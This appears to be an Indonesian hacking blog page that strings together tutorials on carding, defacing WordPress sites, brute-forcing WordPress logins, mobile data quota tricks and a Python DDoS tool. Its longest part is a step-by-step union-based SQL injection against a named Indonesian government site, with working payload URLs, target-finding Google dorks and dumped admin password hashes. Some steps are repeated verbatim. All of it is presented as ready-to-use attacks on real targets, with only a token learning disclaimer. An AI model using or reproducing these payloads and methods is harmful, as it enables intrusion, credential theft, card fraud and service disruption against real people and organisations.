![VC [ Vianz-Cyber4rt ]](http://i.imgur.com/sVC2PiF.jpg "Visit Vianz-Cyber4rt [ V-C ]"){kind=small}
.png)
Hey hey hey ketemu gw lagi..nih Sobbat Bnyk Yg Minta Pingin Carding
Ingget Yg Om Ini Cuman Untuk Pembelajaran Doang Jgn Di Salah Gunakan
Ane Share Formatnya html Om Jadi Klo Buka Lihat Gambar Di Bawah Ini Om
okke Nihh Dowlod File htmlnye Sebelum Downlod Harus Join Group Dulu Om Soalnya Ane Uplod Di Group
Tags: Cara Carding, Cara Mendapat CreditCard, Cara Mendapat KartuKredit,
1.Pertama yang harus anda lakukan adalah Kunjungi Link Ini IniLoh
Lalu daftar dan klik continue
2. Masuk intuit.com dan sign in
3. Jika sudah, pilih Domain. Masukan domain yang anda inginkan lalu klik Check Availability(lihat gambar)
4. Jika domain yang anda pilih tersedia, klik Get Domain. Tapi jika domain sudah digunakan, terpaksa anda harus Search Again.
5. Setelah klik Get Domain. Isi formulir Confirm Your Contact Info untuk mengkonfirmasi email anda lalu klikSave & Continue
6. Selanjutnya perhatikan gambar di bawah :
Domain Privacy jangan dicentang sedangkan I agree to the Terms of Service harus dicentang, lalu klikSubmit.
7. Setelah itu akan muncul popup Please Enter Your Billing Information. Isi seperti gambar di bawah ini lalu klik Purchase.
Untuk Biling Information Klik Disini
NB:JIKA TDK BISA MOHON KOMENTAR
Lalu daftar dan klik continue
2. Masuk intuit.com dan sign in
3. Jika sudah, pilih Domain. Masukan domain yang anda inginkan lalu klik Check Availability(lihat gambar)
4. Jika domain yang anda pilih tersedia, klik Get Domain. Tapi jika domain sudah digunakan, terpaksa anda harus Search Again.
5. Setelah klik Get Domain. Isi formulir Confirm Your Contact Info untuk mengkonfirmasi email anda lalu klikSave & Continue
6. Selanjutnya perhatikan gambar di bawah :
Domain Privacy jangan dicentang sedangkan I agree to the Terms of Service harus dicentang, lalu klikSubmit.
7. Setelah itu akan muncul popup Please Enter Your Billing Information. Isi seperti gambar di bawah ini lalu klik Purchase.
Untuk Biling Information Klik Disini
NB:JIKA TDK BISA MOHON KOMENTAR
Kali Ini Ane Share Tutorial Tebas Index Wordpress Tanpa Tanem Shell :v Biasnya Wordpress KaanGk Bisa Di Tanemin Shell Jadi Y Langsung Saja Kerugianya Admin Sanggat Gampng Untuk Backup
1).Join Group Dulu : https://www.facebook.com/groups/662377320447873/
2).Buka Halaman Login Truss Login
3).Klo Sudh Truss Ke Appearance => Editor
4).Klik Tulisan Main Index Template Truss Edit Save Dehh
Good Job !!
.jpg)
Pengertian SQL Injection
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :
id=$id;……. > Got Error
Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.
Contoh :
http://situstarget.com/news.php?id=1’
http://situstarget.com/news.php?id=’1
Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.
Dork SQLi :
inurl:azerty.php?id= ,Disini saya sudah menemukan targetnya : http://diklat.lampungprov.go.id/more.php?id=1
inurl:bouquin.php?id= ,
inurl:lien.php?id= ,
inurl:clavier.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.
http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error
Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.
Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.
Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--
Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.
Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--
Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--
Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--
Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya. kalo semua sudah ketemu, tinggal loggin aja, jebreet jebreet jebreet :D
Saya kira hanya begitu saja, kurang lebih mohon maaf.. kalo ada kesalahan mohon diperbaiki :) wassalam :*
Content Creator : Onix AQua
UPDATE: Link sudah diperbaiki... :)
Salam Sobat,, ;)
Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Pertama Download Bahan-Bahannya:
WPBruteforce
Password: http://indocyberarmy.blogspot.com
Dork: inurl:/wp-login.php
Yup, saatnya kita beraksi.. :)
Live Target: http://live-target.pusku.com/
Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute
.bmp)
Lalu buka comand dengan cara : Klik Start>Run>ketik cmd
.jpg)
.jpg)
Lalu setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter!
.jpg)
Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!
.jpg)
Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10
.jpg)
Lalu tekan enter!
.jpg)
.jpg)
Wew! Berhasil tuh! wkwkwk Mantap! :p
.jpg)
GoodLuck!! :D
Content Created By : Onix AQua
Tag : Cara Deface Wordpress, Brute Attack Wordpress, Deface Website Mudah
Ok,kali ini kami akan berbagi trik untuk mengakali Quota Internet kita yang sudah habis( Khususnya untuk Netter yang menggunakan Paket-paket Unlimited seperti Three,Flash atau lainnya).
Dimana sudah anda ketahui jika Quota paket kita habis maka di pastikan akses internet kita jadi LEMOT.
Kenalkan MDMA,,!
(MDMA)Mobile Data Monitoring Application adalah software untuk memonitor data, trafik, dan signal dari modem atau mobile broadband.
Tool ini yang akan kita pakai untuk Hack Quota Internet yang Habis.Cara sederhana hanya dengan memainkan Apply pada MDMA :D
Sebagai contoh saya menggunakan APN: Telkomsel (2)
Pertama kali pada Conection type rubah ke GPRS/EDGE ONLY (4) dulu
Tunggu sampai dapat sinyal EDGE (1)
Kalau sudah EDGE (1) sinyalnya, rubah ke 3G ONLY (3)
Tapi jangan di Apply dulu
Kita Connect (5) dial dulu
Kalau sudah muncul trafik, yang biasanya di bawah kanan,,baru klik Apply (6)nanti sinyal berubah jadi HSDPA (1)
ni ss nya gan :D
![[Image: mdma.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJjmfuTUJhZ1MTfeEKmQ5ZHXR5fwWGvsp1oClYWdAN0THFFTFJyCtJH4rYMZSXtonT7ZvG4eJImiWwVvpjKVzLB7uEbOtcwmZ5vTyM1wXQlUF-2Wah-xUb4SZJs9mIaWzGwQOfiQtsURs/s1600/mdma.png)
Hasilnya Browsing Sobat tidak seLo..La sebelumya :D
Jika Soat tertarik silahkan Download MDMA DISINI.
MDMA ini sudah di EDIT agar hanya fitur yg kita gunakan / perlukan yang akan tampil.
Terima Kasih, First post semoga bermanfaat :D
Hasilnya Browsing Sobat tidak seLo..La sebelumya :D
Jika Soat tertarik silahkan Download MDMA DISINI.
MDMA ini sudah di EDIT agar hanya fitur yg kita gunakan / perlukan yang akan tampil.
Terima Kasih, First post semoga bermanfaat :D
Source : Palembang Hacker Link
Okke Kali Ini saya akan Share DDoS Bosen Kalo Share Teknik Deface Truss Hahaha Keep Smile,Nihh Sekarang Ane Mau Share Tools DDoS Dengan Python Langsung Om Ke Objectnya
1).Download Dulu Filenya Klik Disini Password Klik Disini
2). Downlod Dulu Pythonnya Googleing :D
3).BUka cmd Caranya Klik Start => Run => Cmd
4).Simpan File Tadi Di Drive D Truss Ketik /JagadDotID.py Lalu Tekan Enter
5).Masukan Target,Port Dan connections Lalu Tekan Enter
Ok Succes Deh
.jpg)
.jpg){kind=link}